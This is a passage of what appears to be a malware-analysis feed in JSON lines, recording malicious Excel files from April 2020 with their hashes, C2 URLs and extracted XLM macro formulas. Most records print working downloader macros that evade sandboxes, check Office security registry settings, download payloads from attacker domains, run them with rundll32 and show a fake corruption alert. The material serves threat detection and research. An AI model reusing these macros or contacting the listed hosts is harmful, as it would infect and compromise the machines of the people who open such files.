255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Ay8TnmK6Hg\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"73235ae56e1efecbfeffef7ab514af8c28b92fc4cc8a12970b96161dc7bc783e"},"analysis":{"reported":"2020-04-09T16:17:03Z","score":10},"files":[{"filename":"73235ae56e1efecbfeffef7ab514af8c28b92fc4cc8a12970b96161dc7bc783e","filesize":206336,"md5":"1f78ceb92b9f458f84792aaf6088c778","sha1":"17bfe86a4c65e5a2c506e85be33c376b877c8f89","sha256":"73235ae56e1efecbfeffef7ab514af8c28b92fc4cc8a12970b96161dc7bc783e","sha512":"12c5a634c5450409c264d23c0695d25e636351505a1a8b8d856ce523bb675072b03aea58bec304e1efab58bc31dead92a6b33328509b163c922849dfeebc2af4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"73235ae56e1efecbfeffef7ab514af8c28b92fc4cc8a12970b96161dc7bc783e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ZDgXzqP09n\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"734d81279c46fab30ce2deb841366240c905d020cafe33a82daa3b57f723cf2b"},"analysis":{"reported":"2020-04-09T16:17:03Z","score":10},"files":[{"filename":"734d81279c46fab30ce2deb841366240c905d020cafe33a82daa3b57f723cf2b","filesize":168960,"md5":"d91c6feb462220ccd123194f42687632","sha1":"8cf593c49488ab4f16f5e7f442c8f29884d8cb2d","sha256":"734d81279c46fab30ce2deb841366240c905d020cafe33a82daa3b57f723cf2b","sha512":"5509992f635ccfb5d36609d9fe22d61b7682ff6173c7d8cc9d5c1d83e1499eebb3654c76521022f55a4e86834edf38918d22b818eda180917473318d1d153317","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"734d81279c46fab30ce2deb841366240c905d020cafe33a82daa3b57f723cf2b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"t5ybaWhaPm\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"734fd409476490fd9243274a43ef14e3f8b3142fdc1184f02824a91526b7f927"},"analysis":{"reported":"2020-04-09T16:17:03Z","score":10},"files":[{"filename":"734fd409476490fd9243274a43ef14e3f8b3142fdc1184f02824a91526b7f927","filesize":167424,"md5":"0f4c8133c209fe5e12e578d609bc95f6","sha1":"789ef07d5ad83e2f5c07cab545f7e7fec2dadda5","sha256":"734fd409476490fd9243274a43ef14e3f8b3142fdc1184f02824a91526b7f927","sha512":"94855467aeb6af6f04928bc6f8375f8a9d06265f8c35cca3fcce5e988a57bd6aa39a7bb029ae93f7dbe5085b9227f1f2840b2564c050716c79282424dfdb8adc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"734fd409476490fd9243274a43ef14e3f8b3142fdc1184f02824a91526b7f927.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"yxeDAc8MeN\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$18C$2\u003c770,CLOSE(FALSE),)\nIF(R$19C$2\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$39C$10)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7360e3a6f8943e610dc336f99bbe3e67ea6664ec75a1ffcc8abc41cceab253b8"},"analysis":{"reported":"2020-04-09T16:17:03Z","score":10},"files":[{"filename":"7360e3a6f8943e610dc336f99bbe3e67ea6664ec75a1ffcc8abc41cceab253b8","filesize":185344,"md5":"9269f64ff1fdb7965d2645716fe29622","sha1":"5bb20705d42fe4b3d24aa2f030fb7b2f4fa68bcf","sha256":"7360e3a6f8943e610dc336f99bbe3e67ea6664ec75a1ffcc8abc41cceab253b8","sha512":"21a9963e2a144314e691249ca78419bb1ca2783a216f2839a21e4170e5acd2966665ef85190867a2cf33f6abe8afe416562a6f59a790d4ab184f260f96c336db","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7360e3a6f8943e610dc336f99bbe3e67ea6664ec75a1ffcc8abc41cceab253b8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"73666b7b69db31d5b1f6ebe4affb10ca92127aaca05d156b0a921a6e00e39d14"},"analysis":{"reported":"2020-04-09T16:17:03Z","score":10},"files":[{"filename":"73666b7b69db31d5b1f6ebe4affb10ca92127aaca05d156b0a921a6e00e39d14","filesize":144384,"md5":"5d9ade948a2ade8dd45945f6b3966bcd","sha1":"8fa2630fbaf6e1a322461b4d73e709f776e9a895","sha256":"73666b7b69db31d5b1f6ebe4affb10ca92127aaca05d156b0a921a6e00e39d14","sha512":"096df29e4610f78b9aed6baef46b398f928583d34a8b2c9b70c24399e4e3991fb9af00feaf614911d35702273225d4b4f20c11273c7653435724cd442ebb5130","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"73666b7b69db31d5b1f6ebe4affb10ca92127aaca05d156b0a921a6e00e39d14.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"ucGZe0AyFF\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"73705c77c2cfd94ba5ae0aecbfa16f87713e916a5014f0e372da1dbf61814cbd"},"analysis":{"reported":"2020-04-09T16:17:03Z","score":10},"files":[{"filename":"73705c77c2cfd94ba5ae0aecbfa16f87713e916a5014f0e372da1dbf61814cbd","filesize":112640,"md5":"4d09fd2cc6440886417448dea3246fd6","sha1":"1809a0fd7458b3bbdaca4656321e796f3cf80b58","sha256":"73705c77c2cfd94ba5ae0aecbfa16f87713e916a5014f0e372da1dbf61814cbd","sha512":"ffc9ba9148747347e5f7907f7faaf45da50673d04975e8651583b6cd2cdc9f850aba82f2929b29439186786d7eaeb25c387bb0f4140c8a53c36c291c52cc7500","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"73705c77c2cfd94ba5ae0aecbfa16f87713e916a5014f0e372da1dbf61814cbd.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"737b2cb1a89549888401b853c115662fda4b42f1f28ffaf46386f29e92fc80d6"},"analysis":{"reported":"2020-04-09T16:17:03Z","score":10},"files":[{"filename":"737b2cb1a89549888401b853c115662fda4b42f1f28ffaf46386f29e92fc80d6","filesize":168448,"md5":"d12377c52da04b4143388a345d0bd9ce","sha1":"6f8892e48d3f5bf33273642592176c249d0353ae","sha256":"737b2cb1a89549888401b853c115662fda4b42f1f28ffaf46386f29e92fc80d6","sha512":"3a622bcc4ed34959aac72f6006fae4045a7c346507fe442680cc58577c182b5669af48e9daf017e7ffffb1c927af5293974bc1e7f75d61755ba46a8d6f550965","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"737b2cb1a89549888401b853c115662fda4b42f1f28ffaf46386f29e92fc80d6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"1O1OagrZYc\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"737fe0ccd9562c85db228311452b792b9c5fcc9582ecd85adc55d83dccdd8605"},"analysis":{"reported":"2020-04-09T16:17:03Z","score":10},"files":[{"filename":"737fe0ccd9562c85db228311452b792b9c5fcc9582ecd85adc55d83dccdd8605","filesize":226304,"md5":"1ddc65a80f6fb3cb1ca8100ec788b943","sha1":"b07bed176f9edab876b8986838e5563a801fd00e","sha256":"737fe0ccd9562c85db228311452b792b9c5fcc9582ecd85adc55d83dccdd8605","sha512":"83adc15533c706283aa621a1e29314ece3e34f56f703b959b70471f36ea093e49b0705d1b2de71e52842f4a368c913c5efe94cdcd1e620b62845823b7ef546a3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"737fe0ccd9562c85db228311452b792b9c5fcc9582ecd85adc55d83dccdd8605.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ii5DHVtQgB\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7382435aa882c175e0594fc07743017ed15aa397ecc6ec372d1c7572a68d39ab"},"analysis":{"reported":"2020-04-09T16:17:03Z","score":10},"files":[{"filename":"7382435aa882c175e0594fc07743017ed15aa397ecc6ec372d1c7572a68d39ab","filesize":109568,"md5":"c9e96e889853f3b67e0373092da811d2","sha1":"4d1cc851573f55a2b90da160b93e9da3a0c9fc0b","sha256":"7382435aa882c175e0594fc07743017ed15aa397ecc6ec372d1c7572a68d39ab","sha512":"ebb8ce6c5f4e5709aac891ba9c0eda740d76771a4f9d3de5a25d033b12eaa54005b4831e3405f4ac1e69354a67d2cb13017e60f32b5d4b89a62498d83b96cbd4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7382435aa882c175e0594fc07743017ed15aa397ecc6ec372d1c7572a68d39ab.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wgyafqtc.online/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(13)\u003c770,CLOSE(FALSE),)\nIF(GET.WORKSPACE(14)\u003c381,CLOSE(FALSE),)\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"D2OOO9fy2n\",TRUE)\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"738315a1a6223c273d5c0c770de99c76b2adfa9a8d6a19d6a0b9b63216cada35"},"analysis":{"reported":"2020-04-09T16:17:03Z","score":10},"files":[{"filename":"738315a1a6223c273d5c0c770de99c76b2adfa9a8d6a19d6a0b9b63216cada35","filesize":185344,"md5":"de305abf988cde565412d13638e97a9c","sha1":"9632c8d396fdcf5286449a9f2cd0bbc2e70e6855","sha256":"738315a1a6223c273d5c0c770de99c76b2adfa9a8d6a19d6a0b9b63216cada35","sha512":"a581929b8a00494f2117d7b08a8b15aa77b8f66732fc2fcc78c22711411c0bcb8a857372877863f8810b3987fa5d72c28d5992d5514a3d72390db72a20998eb2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"738315a1a6223c273d5c0c770de99c76b2adfa9a8d6a19d6a0b9b63216cada35.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7388c85a67506c7e7a4bd289ed420762ef5ee654cef64672945a8b5889d87e45"},"analysis":{"reported":"2020-04-09T16:17:03Z","score":10},"files":[{"filename":"7388c85a67506c7e7a4bd289ed420762ef5ee654cef64672945a8b5889d87e45","filesize":144896,"md5":"bbfd9dd5a44e3c72a04454a003c092e1","sha1":"f665d1a12e215526a491f9f8f35ba4e1291cd008","sha256":"7388c85a67506c7e7a4bd289ed420762ef5ee654cef64672945a8b5889d87e45","sha512":"eda182edcf7d103a8bb1bc8259ab2a9a30d9bd223c9ac45853d9745fa0dfd3de324bc577478e725f045d7c68a4c2548441cc0ca49841237b150e3f5a8e757bf0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7388c85a67506c7e7a4bd289ed420762ef5ee654cef64672945a8b5889d87e45.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/1451345341fff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"73ac6a7f880de3083482f6557bb10cb22ea5866bd4206e4498482979446c607e"},"analysis":{"reported":"2020-04-09T16:17:03Z","score":10},"files":[{"filename":"73ac6a7f880de3083482f6557bb10cb22ea5866bd4206e4498482979446c607e","filesize":168448,"md5":"55c1be91f66afffcf3f629ba5b0e303f","sha1":"61330490eacdf62fddcac2f937596cb8b75e4204","sha256":"73ac6a7f880de3083482f6557bb10cb22ea5866bd4206e4498482979446c607e","sha512":"6419c5efbe689cb84a37c3dbf1d22a1a9f1e8e9cd1b3b7ac50f524cb354302c0e2601331c590124ef2af57a549b20b44ee13dff1adf3054dcb5d28a8af97f3f1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"73ac6a7f880de3083482f6557bb10cb22ea5866bd4206e4498482979446c607e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"6A3D26AbN5\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"73b03822cad5aded1dd4fbe7a58ae319060a388a256ef4fc2f13fc06d6070f99"},"analysis":{"reported":"2020-04-09T16:17:04Z","score":10},"files":[{"filename":"73b03822cad5aded1dd4fbe7a58ae319060a388a256ef4fc2f13fc06d6070f99","filesize":167424,"md5":"4618d146d1fb836e52bf3cfed100f005","sha1":"b952b404b5cc1dd6ee4c414acfbabce144bc41b1","sha256":"73b03822cad5aded1dd4fbe7a58ae319060a388a256ef4fc2f13fc06d6070f99","sha512":"4c13fca179bf2f72504359e3d4ad1f9a98f2d219d7f0ad5192ee5f5b70d4101340670b8be66f7540da20b27e69c4e31c67e8ccaad674cc62c3b19e5a422f35e6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"73b03822cad5aded1dd4fbe7a58ae319060a388a256ef4fc2f13fc06d6070f99.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"5UfJf1weZS\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$18C$2\u003c770,CLOSE(FALSE),)\nIF(R$19C$2\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$39C$10)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"73b3388cbdbdae095e260b0c1ddad588b83ad0223317a0385b9b63781a481971"},"analysis":{"reported":"2020-04-09T16:17:04Z","score":10},"files":[{"filename":"73b3388cbdbdae095e260b0c1ddad588b83ad0223317a0385b9b63781a481971","filesize":142848,"md5":"eee84cb5ea544f4bf82a50fe8903235c","sha1":"edb7987599d562ff160969ac0cc931fd4351d1a0","sha256":"73b3388cbdbdae095e260b0c1ddad588b83ad0223317a0385b9b63781a481971","sha512":"2f6bed71b3e68a2fee20c17a796421d048c31c499889ba7117bd1f5fc6b7d44c40dcf9b0e41bdb06c983ab6778632a6a063f2d626a5d8ee5cfb28743f5014a01","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"73b3388cbdbdae095e260b0c1ddad588b83ad0223317a0385b9b63781a481971.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/fsgbfgbfsg43"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"XlZZB50kLH\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"73b68164c82f14f8eaa5e0f7d3acbe64056541f0839aadc9f74037f37a31afe6"},"analysis":{"reported":"2020-04-09T16:17:04Z","score":10},"files":[{"filename":"73b68164c82f14f8eaa5e0f7d3acbe64056541f0839aadc9f74037f37a31afe6","filesize":170496,"md5":"06fea784f4b7df2ca2e9e39fba3fe3f7","sha1":"a5dcbc65d6f7ee4d3a7717c2c33f93d008b77bf2","sha256":"73b68164c82f14f8eaa5e0f7d3acbe64056541f0839aadc9f74037f37a31afe6","sha512":"bfa92b4ff552698de85ea9a482d7ce996ee7509b874b00ed7b51065277338343974db4298a85f6b78bbb87e85843da0333e140606104b12b73ccd04120a3fde6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"73b68164c82f14f8eaa5e0f7d3acbe64056541f0839aadc9f74037f37a31afe6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"RJnERS1i6S\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"73d25ae208b2bc3fbd50ae7ac70a38b7f206adc3d00a0e33eac992c46f052eeb"},"analysis":{"reported":"2020-04-09T16:17:04Z","score":10},"files":[{"filename":"73d25ae208b2bc3fbd50ae7ac70a38b7f206adc3d00a0e33eac992c46f052eeb","filesize":167936,"md5":"0f49585bf522b80206b98c4c3411374c","sha1":"32b2ddf4c9abe16234d056e4ad00ebf28a642011","sha256":"73d25ae208b2bc3fbd50ae7ac70a38b7f206adc3d00a0e33eac992c46f052eeb","sha512":"a78a99cbda677da77b6189db97ce178d81a3a29cd6e6cdc80cb65071bdef2b334f5b8c78ad64a485c65359059ca45c9202f7777bd3dbab7a23720daf7a6ffef2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"73d25ae208b2bc3fbd50ae7ac70a38b7f206adc3d00a0e33eac992c46f052eeb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"l79cQ9Shep\",TRUE)\nGOTO(R$0C$19)"}}}]}
